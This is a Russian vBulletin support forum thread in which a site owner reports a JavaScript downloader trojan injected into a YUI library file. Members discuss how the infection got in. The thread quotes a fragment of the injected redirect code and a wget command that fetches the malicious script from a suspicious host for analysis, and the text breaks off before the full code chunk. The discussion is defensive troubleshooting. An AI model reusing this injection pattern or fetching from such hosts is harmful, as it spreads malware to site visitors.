VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Касперский обнаружил вирус на сайте в файле "\clientscript\yui\connection\connection-min.js". Файл был запостен сюда для проверки - http://www.virustotal.com/file-scan/...d4d-1314288002
Причем только Касперский нашел "вирус".
Я решил забить на это дело, но написал в их службу поддержки. Мне объяснили, что данный файл заражен, т.к. была встроена ссылка на левый ресурс в зоне .com в конце файла "var dUr="http://uasrum.ком/s1/in.cgi?2";var timerMulti;var......."
Дата создания и изменения файла этого на сервере не изменялась.
Отсюда вопрос, дырка в скрипте?
вряд ли это из дистрибутива, т.к. это файл из яхушного фремворка
где то на сайте/форуме дыра
либо на компе ищи коня
@Cr00t
Продвинутый
Join Date: Jun 2005
Location: MSK
Posts: 407
Версия vB: 4.2.х
Пол:
Reputation:
Опытный 85
Репутация в разделе: 83
0
kerk, Да я посмотрел что это за файл.
На компе сложно искать вирусы, т.к. форум стоит на линуксовом сервере (не дома).
Интересно как он пробрался в такие дебри чтобы внедриться именно в этот файл... Возможно в Yahoo framework есть дыра, но тогда бы в инете было больше информации.
Буду копать
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,711
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20257
Репутация в разделе: 8432
0
искать коней нужно у себя на компе =)
часто очень такие вот вирусы лезут на сайты/форумы через фтп-клиенты, когда ты делаешь что то с файлами на своем серваке
@Cr00t
Продвинутый
Join Date: Jun 2005
Location: MSK
Posts: 407
Версия vB: 4.2.х
Пол:
Reputation:
Опытный 85
Репутация в разделе: 83
0
kerk, я согласен, но в данном случае заражение произошло ещё до того как!
@Cr00t
Продвинутый
Join Date: Jun 2005
Location: MSK
Posts: 407
Версия vB: 4.2.х
Пол:
Reputation:
Опытный 85
Репутация в разделе: 83
0
Подобная сука вернулась опять, но уже вирус был другой. Файл тот же...
Обнаружено: Trojan-Downloader.JS.JScript.g
И опять Касперский нашел. Просто вундеркинд!!!
Странно, одним словом.
Файл с ВИРУСОМ в аттаче, в архиве. Не запускайте js файл дабл-кликом.
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,711
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20257
Репутация в разделе: 8432
0
сам по себе код не вредный, но он прицепляется к тегу "боди" и уже потом тянет всякую гадость
указанный в коде скрипт - нулевого размера
run CMD
wget ****://yandextools.com/ajax/jquery.min.js
кусок кода, который прилепляется к твоему скрипту: